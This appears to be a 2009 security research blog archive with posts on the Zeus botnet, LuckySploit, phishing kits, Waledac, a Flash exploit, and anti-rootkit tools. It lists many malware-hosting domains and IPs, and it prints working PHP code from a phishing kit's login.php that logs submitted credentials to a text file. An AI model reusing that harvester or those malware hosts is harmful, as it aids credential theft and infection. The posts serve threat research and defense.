Saturday, February 28, 2009
Rootkit Analytics: Updates
One more tool will be released by Ryan for Linux Kernel-mode rootkits, "SiD (Symbol Interception Detection)". We are still working on the content and the Windows User-mode Rootkit analysis tool by Naga.
The most probable release date for RootkitAnalytics.com would be Mar 8th, 2009.
- EF
Friday, February 27, 2009
LuckySploit, the right hand of Zeus
Currently, these scripts are subjected to obfuscation, is being used by botnet Zeus to recruit zombies PCs through Drive-by-Download attack.
When accessing the website only displays a blank page, but to check its source code is a code written in JavaScript like this:
The script is encrypted with the RSA algorithm. This information is displayed at the end of the code.
Another interesting fact is that the script is displayed only once, ie, if you try to log back in to the same address, again to check the HTML source code, the script is no longer available.
Some of the domains that contain LuckySploit are reflected below:
r-state .com/ equi/It's worth noting that many of these URL's are active, therefore if you decide to access any of it, keep in mind the safety measures appropriate to the case.
trafffive .cn/wait/ ?t=15
trafffive .cn/bm/ ?t=15
directlink9 .cn/wait/ ?t=15
directlink4 .cn/bm/ ?t=15
directlink2 .cn/wait/ ?t=15
directlink1 .cn/bm/ ?t=15
directlink0 .cn/wait/ ?t=15
superioradz .info/opis3/ ?t=2
superioradz .info/opis2/ ?t=2
rodexcom .org/parus/ ?t=5
dvlorg .net/parus/ ?t=25
top.sei-keine .com/u-store/ ?t=1
statclick .net/main/ ?t=1
deinglaube .com/ images/
202.73.57.6/ tomi
federalreserve.banknetworks .net/bb/ ?t=2
fuadrenal .com/mito/ ?t=2
fuck-lady .com/prn/index .php
hello-to-you .net/rttz/ ?t=6
In some script clearly read at the end of a message that says:
attack_level = 0;;In this way, Zeus is adhering to its network equipment malicious computer infected.
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
Related information:
Zeus botnet. Mass propagation of trojan. Part two - Spanish version
Zeus botnet. Mass propagation of trojan. Part one - Spanish version
Malware attack via Internet - Spanish version
# Jorge Mieres
Wednesday, February 25, 2009
Phishing Kit In-the-Wild for cloning of web site, version 2
This package has expanded its "coverage" of fraud, offering a second package with a large quantity of fake websites that seek to be transparent to the user and obtain their information.
Phishing kit keeps the same strategy of spreading the pack earlier, ie, an index.html file that is a true copy of the actual page, login.php and a .txt, but not the proposals of cloning to steal data:
Adult Friend Finder
Amazon
Bebo
Break
DeviantArt
FlickR
FreeWebs
GeoCities
LiveJournal
Playstation Underground
PornoTube
SendSpace
SourceForge
Studivz
Tagged
Tripod - Lycos
Veoh
WWE
Xanga
XTube - Images R Broken
On the one hand, strategies that seek to raise money without major efforts are becoming more aggressive and more invasive, and on the other hand, most of these kits are available online for free or against payment, in this case, a sum of money not as high as with similar pack.
Phishing attacks are becoming more dangerous because its creators are seeking efficiency in the development of the copy to be as faithful as possible to the real. This represents a potential risk associated with the combination with intrusive techniques such as malware kit (ElFiesta, MPack, IcePack, etc..) that are implanted in servers ghosts or violated to disseminate phishing, is becoming increasingly dangerous for those unknown, even to those who know well, the functioning of these attack techniques.
Related Information
Phishing Kit In-the-Wild for cloning of web site
# Jorge Mieres
Tuesday, February 24, 2009
Zeus botnet. Mass propagation of trojan. Part two
The map below shows information regarding each host infected by Zeus who is identified through a point. Although at first glance, the information shown in the map may feel inadequate, it must be remembered that each node can represent multiple IP addresses or domains hosted on one server, so the percentage of equipment infected power.
Although the list is very small compared with the number of domains that host Zeus, is extremely important that managers locked themselves in their network structure to avoid infection.
85.17.139.189 investmentguard.co.uk/foto/body_bg_akh10 .jpg
85.17.143.132 mainssrv.com/pic/timeats .jpg
91.197.130.39 goldarea.biz/bot .exe
92.48.119.151 allmusicsshop.com/bnngJPdf7772Nd .exe
92.62.100.14 chinkchoi.net/3n539@32d .exe
92.62.101.54 drupa1.com/s/fuck .exe
92.62.101.54 ltnc.info/utility/lease/software/update/config .bin
92.62.101.54 tdxs.info/utility/backup/config .bin
94.103.80.150 zone-game.org/ldr .exe
94.75.214.18 vokcrash.com/144/load .php
196.2.198.243/wweb11/zdr .exe
196.2.198.243/xwweb/zdb .exe
58.65.236.41/z .exe
67.225.177.120/moon/cfg1.bin
78.26.179.201/matt/loader .exe
91.211.65.122/~nostr551te/endive/dogi .exe
92.241.164.198/~cadazeu/testbot/ldr .exe
92.62.101.60/g1/data
92.62.101.60/g2/data
92.62.101.60/g2/run .exe
94.247.3.211/ddk/audio
94.247.3.211/rot/load .exe
94.247.3.211/rot/zlom
freecastingus.cn/z12/config .bin
freecastingus.cn/z12/loader .exe
http://ltnc.info/utility/lease/software/update/config .bin
http://tdxs.info/utility/backup/config .bin
Furthermore, each of the domains, along with its IP address, representing an infected host or server violated.
Given that the spread of infection and are employed by Zeus, email and technical Drive-by-Download through different exploit where one of the best known is Luckysploit, or sites which are vulnerable to malware implanted kits as ElFiesta, it is extremely important to block domains and IP addresses that I have outlined.
Related Information
Zeus botnet. Mass propagation of trojan. Part one
# Jorge Mieres
Monday, February 23, 2009
Spammers spreading malwares through Oscar 2009 award message
SOURCE:
hxxp://freewebs.com/upyachko/2009-oscar-winners.html
hxxp://2009022303.ojaodfbej.bee.pl/oscar_ballot.html
hxxp://009022214.ipoitifqo.bee.pl/oscar_winners.html
hxxp://2009022219.ipoitifqo.bee.pl/oscar_winners.html
hxxp://2009022310.ojaodfbej.bee.pl/oscar_results.html
hxxp://hxxp://2009022311.ojaodfbej.bee.pl/oscar_ballot.html
hxxp://2009022302.ojaodfbej.bee.pl/printable_oscar_ballot_2009.html
hxxp://2009022308.ojaodfbej.bee.pl/oscar_results.html
hxxp://2009022221.ipoitifqo.bee.pl/oscar_party_food.html
hxxp://2009022214.ipoitifqo.bee.pl/oscar_live.html
hxxp://2009022214.ipoitifqo.bee.pl/oscar_awards_2009.html
hxxp://2009022220.ipoitifqo.bee.pl/oscar_schedule.html
hxxp://2009022218.ipoitifqo.bee.pl/oscars_time.html
hxxp://2009022304.ojaodfbej.bee.pl/oscar_pre_show.html
hxxp://2009022304.ojaodfbej.bee.pl/oscar_coverage.html
hxxp://2009022221.ipoitifqo.bee.pl/what_time_do_the_oscars_start.html
hxxp://2009022304.ojaodfbej.bee.pl/what_channel_are_the_oscars_on.html
hxxp://2009022301.ojaodfbej.bee.pl/oscar_picks.html
hxxp://2009022303.ojaodfbej.bee.pl/oscar_red_carpet_live.html
hxxp://2009022304.ojaodfbej.bee.pl/abc_oscars.html
hxxp://2009022302.ojaodfbej.bee.pl/oscar_odds.html
hxxp://2009022303.ojaodfbej.bee.pl/watch_oscars_online.html
hxxp://2009022304.ojaodfbej.bee.pl/oscar_scorecard.html
hxxp://2009022304.ojaodfbej.bee.pl/miley_cyrus_oscars.html
hxxp://2009022302.ojaodfbej.bee.pl/oscar_bingo.html
hxxp://2009022302.ojaodfbej.bee.pl/oscars_tonight.html
hxxp://2009022304.ojaodfbej.bee.pl/oscars_2009_time.html
hxxp://2009022303.ojaodfbej.bee.pl/oscar_predictions.html
REDIRECTED TO
hxxp://xp-police-09.com- Spreading HTTP Fake Codec
hxxp://liteantispywareproscanner.com- Spreading TROJ_FAKEAV.TJ
hxxp://scanlog6.com-spreading Js.downloader
hxxp://goscanbay.com-Contains 37 exploits
(http://google.com/safebrowsing/diagnostic?site=goscanbay.com/)
hxxp://stabilitytraceweb.com- spreading Trojan-Downloader.Win32.FraudLoad.vkva (Detected by kaspersky)
Search tags:
oscar_winners,oscar awards,oscar_schedule,printable_oscar_ballot
2009,oscar_ballot,oscar_results,oscar_party_food,oscar_awards_2009,oscars_time,osca
rs_on_tv,oscar_live_stream,oscar_night, oscar_pre_show, oscar_coverage, what_time_do_the_oscars_start , what_channel_are_the_oscars_on , oscar_picks, what_channel_are_the_oscars_on, oscar_red_carpet_live, abc_oscars, oscar_odds, watch_oscars_online, miley_cyrus_oscars, oscars_2009_time, oscar_bingo, oscars_tonight, oscars_2009_time, oscar_predictions, 2009 Oscar winners,
- Analysis by Kalyan
Spyware Analytics: Forum to choose...
We are in the process of finding out the best forum software to use. "Best" is a relative term, and always depends on what one is looking for.
* Security
* Usability
* Look & Feel
* Features
We looked at http://www.forummatrix.org/ and other sites that gives comparison of blogs. Though many sites list Discusware and FuseTalk as the two secure forum software. We like the really cool look and feel of IP.Board from InvisionBoard. But being a security forum, we should give first preference as listed in the 4 things we are looking for.
If you have any suggestions, experiences and more that you wouldn't mind sharing with us, contact us at contact.fingers @ gmail.com
- EF
Sunday, February 22, 2009
Malware Analytics: Status update - Releasing very soon
MalwareAnalytics portal is releasing in 2-3 weeks. The static part and backend is complete. We are almost about to complete the dynamic part. Thanks to Bonfa and his 2 friends for their hard work and dedication. We have also worked on load balancing, anti-reversing and anti-Virtual Machine Detection.
If you guys know any reliable and cost effective, dedicated-server hosting services or data centers, kindly contact us at contact.fingers @ gmail.com.
- EF
Saturday, February 21, 2009
Google Groups again used to spread porn spam
Consequently, in recent days, the cells of millions of users have been bombarded by a significant amount of spam on matters referring to erotic or pornographic videos of celebrities, using the Google group service to disseminate pornographic spam.
Some of the phrases used in the case to capture the attention of the users are:
Hey! It is Erica. Wanna date?
Hi! This is Dana from last Monday video shoot. Hello!
It is Norma. Couldn't reach you.
Jessica Alba was caught naked in sauna!
Jennifer Aniston was caught naked in sauna!
Jennifer Love Hewitt's nude beach photos!
Cameron Diaz's nude beach photos!
Denise Richards's fitting room hidden pics!
Shakira and her mystery boyfriend pics!
Hi! It is Deena. Fresh teens who just got legal to pose.
Hi! This is Amelia. Fresh teens who just got legal to pose.
On the other hand, some of the profiles used in the service in question are:
http://groups.google.com/group/zcmcrowderifjzub/?iqhphgbeaxegecyvaduryqmgzzv&pli=1
http://groups.google.com/group/rnushafermrlio/?xsopvgfxraihhintaudhuhgwxqqdr
http://groups.google.com/group/xm388drtr876gx/web/xblsdmz
http://groups.google.com/grou/giuyburroughsyqk/?oscfdntsxfsxygrimaykrdnbpiiwk
http://groups.google.com/group/vlmwillistvkkyx/?mjywanyxpngnhthdsbmhwsgspozh
http://groups.google.com/group/tixjotin2wtv/web/rqcc8ne
http://www.google.com/group/rsnclineiqs/?fchgwoioqdxyhxzujnqhsj
http://www.google.com/group/qjmjvwbrobbinsyne/?vuqkpijorysniuzmcmrcmu
http://www.google.com/group/smpwthackercdi/?netcrpysqsrpnwwhddfcvxkemobiv
http://groups.google.com/group/rt4q26ggg4azg/web/pvnrywa
http://www.google.com/group/henvrankinosv/?mpsajqfwyzlqxqpouxokymddoos
http://www.google.com/group/aediyyxfieldsljx/?imingpivvlnkyputxttpugmcwdt
http://groups.google.com/group/zscsqcgzrxhxno/web/k4xkob
http://www.google.com/group/oapfhxjbledsoeakpas/?lkngiiujnfqyotalcibneib
http://www.google.com/group/dtoercardenasmyld/?nqhbbvfazcqwqchrgyzzgvxyu
http://www.google.com/group/smpwthackercdi/?kzxgxdhqmjthzyrjmeckg
http://www.google.com/group/jpfkdowneyviyxlco/?fknhxtryihnlykkddadzjhq
http://www.google.com/group/ldubartlettvqv/?sjeqkrtkzhipuymmeyohncvvm
http://www.google.com/group/tzqmockjapi/?ieywkhfiwklmksgjhhcnycniwmfym
http://www.google.com/group/mdnsylclynnakjl/?zivtwsmexjcvvapfzejv
http://www.google.com/group/thlssheetscru/?ciotibufyziphemhnqemuz
http://www.google.com/group/ynatdxhjenningswmjfcap/?wkqsusarwnzbqzbtqkmgewrwihj
http://www.google.com/group/eblshoemakergaouclt/?tyvkjqeixthanyzeasoty
http://www.google.com/group/jyqpukinneypnyfw/?aasinzdghhknxajmprdshftcbl
http://www.google.com/group/stfxzdfbegayuguh/?fpkvhcnouznregxpqrvchicwza
http://groups.google.com/group/caylyjacobigyeg/web/kuytfopiufyoutd
http://www.google.com/group/egnjomckennalcwin/?pyjzsnomluxqcgathnbo
http://www.google.com/group/qolurosadomunto/?piqzlscomokvrftqoicliroqv
The list is really long to reflect each address in this post, however, the examples are enough to get an idea in sufficient detail to understand that spam is a problem that affects everyone equally and that the today is one of the most exploited.
# Jorge Mieres
Detecting Kernel-Level Rootkits Through Binary Analysis
Abstract
Rootkits are tool sets used by intruders to modify the
perception that users have of a compromised system.
In particular, these tools are used by attackers to
hide their actions from system administrators. Originally,
rootkits mainly included modified versions of
system auditing programs (e.g., ps or netstat on a
Unix system). However, for operating systems that
support loadable kernel modules (e.g., Linux and Solaris),
a new type of rootkit has recently emerged.
These rootkits are implemented as kernel modules,
and they do not require modification of user space
binaries to conceal malicious activity. Instead, the
rootkit operates within the kernel, modifying critical
data structures such as the system call table or the
list of currently-loaded kernel modules.
This paper presents a technique that exploits binary
analysis to ascertain, at load time, if a module’s
behavior resembles the behavior of a rootkit.
Through this method, it is possible to provide additional
protection against this type of malicious modification
of the kernel. Our technique relies on an abstract
model of module behavior that is not affected
by small changes in the binary image of the module.
Therefore, the technique is resistant to attempts to
conceal the malicious nature of a kernel module.
Keywords: Rootkits, Binary Analysis, Kernel Hardening.
This paper is available here.
- EF
Xprobe2 PCAPs
The PCAPs are available here.
For more on XProbe, click here for the Blackhat'03 Slides and the full PDF version of the formal paper is available here. Though, this paper was released in 2003, the idea is still current and futuristic. Thanks to Ofir Arkin, Fyodor Yarochkin and Meder Kydyraliev, for their research.
If you find any glitches, errors or questions... contact us at contact.fingers @ gmail.com.
- EF
Friday, February 20, 2009
Welcome our new blogger! - Joe from Joebox.org
You could submit your binaries here for analysis.
The architecture of Joebox can be found here:
Version 5.0[Latest]
Version 4.0
Version 3.0
Version 2.0
Version 1.0
If you have any questions contact info @ joebox.org and they would respond to your question.
- EF
SecureQEMU
Thanks to Joe from www.Joebox.org for leading us to this interesting paper.
Read and Enjoy!!!
- EF
Attacks - Weaknesses of security commonly exploited
Unlike what happened years ago, where people with extensive skills in the computer world enjoyed researching these issues with the aim of incorporating more knowledge, at present has been completely distorted giving rise to new characters who use computer resources and knowledge on its operations as tools to commit crime and get some economic benefit.
Every day new vulnerabilities are discovered and, usually, only those responsible for IT including in its just measure the importance of safety and how they can address the serious problem that exists behind vulnerabilities that allow an attacker to violate security environment and commit crimes using the data stolen.
Click here to read more...
- EF
AnĂ¡lisis de un ataque de malware basado en web
Abstract: Internet se ha transformado en una aliada plataforma de ataque para los creadores de malware, quienes a travĂ©s del empleo de diferentes tĂ©cnicas tales como Drive-by-Download, Drive-by- Update, scripting, exploit, entre otros, y la combinaciĂ³n de ellos, buscan reclutar todo un ejercito de computadoras que respondan sĂ³lo a sus instrucciones maliciosas.
Estos ataques, empleando Internet como base para ejecutar cargas dañina de manera directa sobre el sistema vĂctima, de forma paralela, casi instantĂ¡nea y transparente a la vista de los usuarios menos experimentado, se ha convertido en un latente y peligroso riesgo de infecciĂ³n por el simple acto de acceder a un sitio web.
En el siguiente documento se expone un ejemplo concreto que recurre a las acciones antes mencionadas para explotar e infectar un sistema vĂctima, describiendo tambiĂ©n varias caracterĂsticas extras que potencian el daño del malware.
Click here to read more...
- EF
Thursday, February 19, 2009
SpywareAnalytics: Analytics forum for everyone...
Security forum for researchers, engineers, analysts and home users to encourage discussions and provide solutions for spyware analytics and related questions. This is a futuristic project and requires dedicated volunteering. If you would like to be a part of this project, contact us at contact.fingers @ gmail.com. Before you send us an email, kindly:
* ensure that you are cool with dedicating few hours/week,
* ensure that you would consider this as one of your top priority tasks,
* ensure that you would not do this just for your resume.
- EF
Wednesday, February 18, 2009
Zeus botnet. Mass propagation of trojan. Part one
Zeus (also known as Zbot or wsnpoem), just gets in the category of fraudulent and malicious. This is basically a trojan designed to recruit PCs zombies and phishing attacks, financial institutions, banking, social networking sites, stealing data from email authentication, FTP accounts, etc., combining techniques of scripting, exploit, among others.
66.113.136.225 powelldirects.com/awstats/stat1/main .exe
79.135.179.180 anytimeshopforall.com/new_dir/ldr .exe
79.135.187.112 newprogress.info/tmp/ldr .exe
81.176.123.220 light-money.cn/files/ldr .exe
81.176.123.221 conexnet.cn/nuc/exe .php
91.207.117.174 4utraffic.info/tmp/ldr .exe
118.219.232.248 moqawama.co.cc/zv/cfg .bin
208.113.161.124 ebayhelp.co.il/4ebay/5e .txt
115.126.5.50 1.google-credit.cn/q83wi/ld46 .exe
124.217.242.80 custom4all.info/syst/grepko .exe
193.138.172.5 upd-windows-microsoft.cn/zv/ldr .exe
195.2.253.137 mega-3k.com/krot22/rege .exe
195.2.253.186 firebit32.com/mako22/43r .exe
195.55.174.140 www.provis.es/imagenes/menue .exe
201.235.253.22 www.elsanto-disco.com.ar/.z/zeus .exe
211.95.79.6 horobl.cn/dll/cr .txt
213.205.40.169 www.saiprogetti.it/r .exe
216.246.91.49 d1gix.net/forum/load .exe
216.246.91.49 www.commerceonline-service.net/chat/cfg .ini
218.93.202.114 marketingsoluchion.biz/fkn/config .bin
218.93.205.242 cosmosi.ru/lsass .exe
220.196.59.18 infinitilancer.cn/forum/load .php?id=861&spl=7
220.196.59.18 nepaxek-domain.cn/stores/hello .world
220.196.59.18 nepaxek-domain.cn/stores/urko .exe
58.65.236.129 userzeus.com/zw/cfg .bin
58.65.236.129 verified09.com/ldr .exe
58.65.236.129 wcontact.cn/zsadmin/ldr .exe
58.65.237.153 arsofcaribion.com/lder/ldr .exe
67.210.124.90 academcity.com/ic/6e .txt
67.210.124.90 academcity.com/ic/6e .txt
68.180.151.74 emailsupports.com/Info .exe
68.180.151.74 emailsupports.com/z/setup .ini
68.180.151.74 mypage12.com/control/cfg .bin
72.167.232.78 powelldirects.com/awstats/usbtn/conf .sts
72.233.79.18 i-love-porno.com/z/ldr .exe
72.9.154.58 daimtraders.com/vateranery/imgpe .bin
74.86.115.14 arinina.com/cfg/ntdrv32 .exe
77.222.40.33 chixxxa.com/tru/ldr .exe
78.159.96.95 zonephp.com/us/us1 .exe
85.12.197.41 danacompany.ru/css/cs .bin
85.17.109.10 sjfdhw395t.com/newzz/cfg .bin
It's quite dangerous if we consider that in addition to the typical actions of the malware, can be obtained by any person to deposit a certain amount of money in the account of its creators.
Perhaps this is one of the best reasons to argue why the many variants of "Zeus" who are In-the-Wild wiles to recruit zombies looking for our systems. The truth is that, although not up to its name, is one of the largest botnet of the moment.
Even though this last feature is threatened by other "alternatives" of the world as a botnet Waledac, recent Adrenalin, or smaller (in magnitude) Asprox (also known as Danmec) really must be careful not to be victims of these threats are always looking to successfully carry out its mission: to get our money and computer resources.
Related information
Waledac more loving than ever Spanish version
Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs Spanish version
# Jorge Mieres
Trojan Analytics: Backend DB
Trojan analytics is portal that is aimed at research and analysis of Trojans. As mentioned in one of the previous blogs "Trojan Analytics - Coming Soon", Trojan analytics will be concentrating on different types of Trojans including [but not limited to] application-layer Trojans, Trojan backdoor, Trojan bots, Trojan rootkits, and more.
To put this together, we are talking to MegaSecurity.org and other sites to create a back-end that is capable enough to help us in analysis and classification or Trojans that we discover. Naming conventions, family tree/type classification, etc. are currently being sorted out.
- EF
Tuesday, February 17, 2009
Rootkit Analytics: Detection Techniques
Detection techniques can be classified into the following basic categories:
- Signature-based Detection
- Heuristics-based Detection
- Comparison-based Detection:
§ Cross-view based Detection
§ Integrity-based Detection
For more on our reviews and research, stay tuned.
- EF
Monday, February 16, 2009
Phishing Kit In-the-Wild for cloning of web site
This kit suggests Phishing just that. This is a set of web pages from popular sites ready to be uploaded to a ghost server and begin to spread (spam) targeted by social engineering, as it can't be otherwise, to exploit the weaknesses of the weakest link in the security chain: the human factor.
For the moment, and I say for now because surely those who distribute this kit iran expand the range of cloning, the proposals for Phishing attacks are:
AOL.com
AIM.com
d2jsp.org
DailyMotion.com
eBay.com
EverQuest Forum
FaceBook.com
FileFront.com
Gmail.com
Gmail.de
Habbo.de
Habbohotel.com
ICQ.com
store.apple.com
Megaupload.com
MMOCheats.com
Myspace.com
Nexon.net
OGame.de
Oxedion.de
dhl.de (Packstation)
PayPal.com
PhotoBucket.com
RapidShare.com
RapidShare.de
Ripway.com
siteworld.de
Skype.com
store.steampowered.com
Strato.com
Usenext.com
VanGuard
Yahoo.com
YouTube.com
As you will see, many of the pages are heavily used and widely known.
Each of the folders that contain cloning housed, in addition to index.html, a plain text file where it stores the recorded information of the victim and a login.php which contains the following code:
?phpWhere the function header ( 'Location:') contains information on the website and $handle = fopen ( "log.txt", "a") opens the text file log.txt in opening mode and writing.
header ('Location: website');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?
Most of these cloning are active so it's necessary to be vigilant when accessing web sites whose services are similar.
On the other hand, clearly shows that the kit was designed to commit fraud, and the fact of being available on the Internet makes it even more dangerous boosting the chances of being potential victims of these fraudulent actions.
# Jorge Mieres
Sunday, February 15, 2009
IRC Channel for EvilFingers Community
You are most welcome to join #evilfingers in freenode for any related discussions.
- EF
Rootkit Analytics - Part 2
As discussed in previous blogs, we are working on the different layers of rootkit analytics. The first version of our website [www.RootkitAnalytics.com - Coming Soon!!!] will be releasing by the end of Feb 2009. Stay Tuned!!!
We are looking for volunteers with the following specialties:
- Processor/Microcode Experience
- BIOS Programming Experience
- Kernel Programming Experience
But, if you are experienced in rootkits or anything related to the same, kindly contact us as soon as possible, and we will work out a plan customized just for you.
- EF
Rootkit Analytics
User-mode Rootkit Analytics:
Our first tool in this category would be SpyDLL, which would monitor injected process and injected modules inside the processes. We also provide option for the user to remove DLL without shutting down the process and an option to terminate the process itself. This tool will be expanding just like any other tool on our site.
Our next tool in user-mode rootkit analytics would be, WinInternals. This tool will give anything and everything required for a Windows based user-mode rootkit analytics that includes an extended edition of Process Memory Dumper[PMD].
Kernel-mode Rootkit Analytics:
Our first tool in this category would be ElfStat. More about this tool will be discussed in the near future.
The following are our members [sorted alphabetically] in Rootkit Analytics team so far:
Team Leads:
Kirk McGraw [Team Lead/Creator: WinInternals]
Nagareshwar Talekar [Team Lead/Creator: SpyDLL]
Ryan O'Neill [Team Lead/Creator: Elfstat]
Team Members:
Blake Hartstein [Team Member]
There are others whom we are still communicating with, for them to become a part of our team. The normal procedure of joining Rootkit Analytics is to either join EvilFingers in any of the teams and then once the member has proven their skills, they would be moved to any of our analytics divisions depending on their skill set. But we do consider direct volunteering for Rootkit Analytics division if you have prior hands-on anti-rootkit or related experience.
We are still working on expanding our research to other directions such as, application, hardware and firmware rootkits.
Contact us at contact.fingers @ gmail.com[because GMAIL rocks].
- EF
Saturday, February 14, 2009
Waledac more loving than ever
For about a month, this worm started spreading their campaign of using as an excuse, and ahead, the day of love that is celebrated today, February 14, worldwide.
Now, it seems to have saved their entire battery of visual strategies of social engineering to this day, renewing its entire repertoire displaying the following images:
** More pictures
reader.exe MD5: A9286212E0D7B46841C860FD3F058DFA
valentine_card.exe
loveu.exe
start.exe
val.exe
programm.exe
luv.exe
luvu.exe
patch.exe MD5: 1C5E4A7FCBE766133F743C9A0150373D
loveexe.exe MD5: 5C17F98919D2C84C3FD1908630396BB7
mylove.exe
cardviewer.exe MD5: E2F9C7A76581047D493FDE2C4A02737A
As seen through the reporting of VT, Waledac currently has a low level of detection by the antivirus signatures, ie, hasn't only changed the repertoire of images but also the code of the binaries, even more dangerous.
Waledac, Social Engineering and San Valentine Day In Spanish post
# Jorge Mieres
Friday, February 13, 2009
Trojan Analytics - Coming Soon
Thursday, February 12, 2009
Lavasoft ARIES Rootkit Remover
One click scan GUI:
Dialogue box indicating acceptance of critical action:
Ends with results page:
Now, how simple is that. It took less than 30 seconds for the entire scan process. This is a specialized tool and hence time cannot be compared with the efficiency of other generic anti-rootkit tools.
If you wish to volunteer for this project, kindly email us at contact.fingers @ gmail.com
- EF
Waledac, Social Engineering and San Valentine Day
Our mailboxes are examples that describe this situation. Valentine's Day (or fans) is one of them, and if we look a little spam that inundates us, see that many make some reference to the nearby celebration.
In fact, waledac has begun its campaign to spread well before using as a spreading delusion typical image that alludes to the love by which you download a binary called love.exe that far from being loving, infects your computer into a zombie.
As a bonus, earlier this year, in addition to downloading the malware, the page containing a malicious exploit. Among them were:
googol-analisys .com seocom .name seocom .mobi seofon .net goog-analysis .com
Recently, however, developers have migrated to another image that seeks to find the same degree of "tenderness" to waledac downloading.
Some of the names used for the binary:
lovekit.exe
mylove.exe
loveprogramm.exe
love.exe
loveexe.exe
barack.exe
postcard.exe
devkit.exe
runme.exe
you.exe
onlyyou.exe
youandme.exe
card.exe
ecard.exe
val.exe
install.exe
Waledac uses Fast-Flux networks and some of the domains are used to propagate:
adorelyric .com
adorepoem .com
adoresongs .com
alldatanow .com
alldataworld .com
bestadore .com
bestlovehelp .com
bestlovelong .com
cantlosedata .com
chatloveonline .com
cherishletter .com
cherishpoems .com
freedoconline .com
funloveonline .com
goodnewsdigital .com
losenowfast .com
lovecentralonline.com
lovelifeportal.com
mingwater .com
orldlovelife .com
romanticsloving .com
superobamaonline .com
theworldpool .com
topwale .com
wagerpond .com
whocherish .com
worldlovelife .com
worldtracknews .com
worshiplove .com
youradore .com
yourdatabank .com
yourgreatlove .com
yourteamdoc .com
Many compare it to other malicious code as Nuwar (also known as storm or the storm worm) because of the similarity of their strategies for dissemination and malicious activities performed in the infected computer. However, the reality is that waledac is a dangerous malicious code that has been one of the largest botnet networks of the time.
Related information:
Understanding Fast-Flux networks
Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs
# Jorge Mieres
Wednesday, February 11, 2009
Panda Anti-Rootkit
We will be collecting and analyzing rootkits pretty soon with the preexisting toolkits such as these and compare the tools on various stages:
- Preparation & Detection/Monitoring
- Containment/Isolation
- Eradication/Quarantine
- Recovery/Patching
We will look at the various characteristics such as time taken and the overall cleaning process too.
To start with, Panda Anti-rootkit starts with a one click screen where the users can scan rootkits:
Once the users have chosen whether to allow auto-update or not, and the option to go to an in-depth scan[which is most likely recommended, since simple scans on any case might be fast, but what is fast might not be what is efficient at all times.], the software takes you to a Reboot system screen which allows the user to restart their system to make the changes [It is recommended to reboot the system before the scan]:
Once the system reboots, the scanning process automatically starts with the following 6 layers of scan,
- Running Processes
- Windows Registry
- User and kernel hooks
- Services and Drivers
- Files and ADS
- Evaluating Incidents
Second snapshot, that shows progress in the scanning process:
When the process has come to an end a report gets listed as seen in the following image:
If you wish to participate or if you have questions, email us at contact.fingers @ gmail.com.
-EF
Tuesday, February 10, 2009
Exploiting vulnerabilities through SWF
The same wave file attacks using malicious JavaScript that had been mentioned in the post of vulnerabilities through files .js, was combined with other alternatives such as this.
In this case, it exploits a vulnerability in Adobe Flash Player described in CVE-2007-0071 by which through a file .swf manipulated maliciously causes a Buffer Overflow allows code execution by a remote attacker.
This means that if the user accesses, for example, the URL http://www.710sese .cn/a1 / (59.34.197.115) the file is executed f16.swf (MD5: 95EC9202FBE74D508205442C49825C08) that according to the report VirusTotal , is detected by antivirus 18 of 39 for which the sample scanning. The insert in the exploit .swf exploit the vulnerability if you have installed the application and be vulnerable.
Some of the URLs used to spread the exploit are:
http://www.710sese .cn/a1/f16 .swf
http://www.710sese .cn/a1/f28 .swf
http://www.710sese .cn/a1/f45 .swf
http://www.710sese .cn/a1/f47 .swf
http://www.710sese .cn/a1/f64 .swf
http://www.710sese .cn/a1/f115 .swf
http://www.710sese .cn/a1/i28 .swf
http://www.710sese .cn/a1/i16 .swf
http://www.710sese .cn/a1/i45 .swf
http://www.baomaaa .cn/a279/f16 .swf
http://www.baomaaa .cn/a279/f28 .swf
http://www.baomaaa .cn/a279/f45 .swf
http://www.baomaaa .cn/a279/f47 .swf
http://www.baomaaa .cn/a279/f64 .swf
http://www.baomaaa .cn/a279/f115 .swf
http://www.baomaaa .cn/a279/i28 .swf
http://www.baomaaa .cn/a279/i16 .swf
http://www.baomaaa .cn/a279/i45 .swf
http://000.2011wyt .com/versionff .swf
http://000.2011wyt .com/versionie .swf
http://sss.2010wyt .net/versionie .swf
http://sss.2010wyt .net/versionff .swf
http://www.misss360 .cn/versionff .swf
http://www.misss360 .cn/versionie .swf
http://daoye.sh .cn/a08_1272/m16 .swf
http://daoye.sh .cn/a08_1272/m28 .swf
http://daoye.sh .cn/a08_1272/m45 .swf
http://ccsskkk .cn/new7/fl/f16 .swf
http://ccsskkk .cn/new7/fl/f28 .swf
http://ccsskkk .cn/new7/fl/f45 .swf
http://ccsskkk .cn/new7/fl/f47 .swf
http://ccsskkk .cn/new7/fl/f64 .swf
http://1.ganbobo .com/template/kankan/js/4.0/curtain .swf
http://1.ganbobo .com/template/kankan/js/4.0/playerctrl .swf
Once it explodes in your computer, download the binary a1.css from http://d.aidws .com new, a malicious code which we have already mentioned in other post.
Related information:
Exploitation of vulnerabilities through JS
# Jorge Mieres
Monday, February 9, 2009
SpyDLL Eraser - Rootkit Analytics Tool
Title : SpyDLL Eraser ( win32 GUI application)
==========================================
Description : Tool to remove the specified DLL from one or more processes. Many trojan backdoors, rootkits, other malware and spyware process inject their dll into legitimate processes [explorer.exe, lsass.exe, etc.] to keep their activities hidden and to protect themselves from being killed. Some use DLL injection, while others use plugin approach to get their dll loaded into these legitimate processes. This tool will help to distinguish between normal DLL and malicious DLL and help the user to completely erase it.
Features :
* List all running processes
* For each process following information to be displayed
+ process name
+ full path
+ company name
+ version
+ size
+ process start time
+ process memory details
+ modified/access date
* Display specific icons for different kind of processes such as
system processes, services
* For selected process, display all loaded DLLs with following information
+ DLL name
+ Full path
+ Company Name
+ Size
+ Load/.Reference Count
+ Modified/access date
* Differentiate between statically & dynamically loaded DLLs. User should be able to select only dynamically loaded dlls.
* DLL Search feature to look for specified DLL in all listing
processes and list all these processes
* Remove the user specified dll from all running processes automatically.
More features are being added at the moment. Stay tuned for further updates. Contact us at contact.fingers @ gmail.com, if you have any questions.
- EF
Sunday, February 8, 2009
Prevx Gromozon Rootkit Removal tool
SNAP 1 :
The tool then warns the user, that one should disable any system security tools, such as an Anti-virus, that may interfere with the removal of Gromozon rootkit, as shown in SNAP 2.
SNAP 2 :
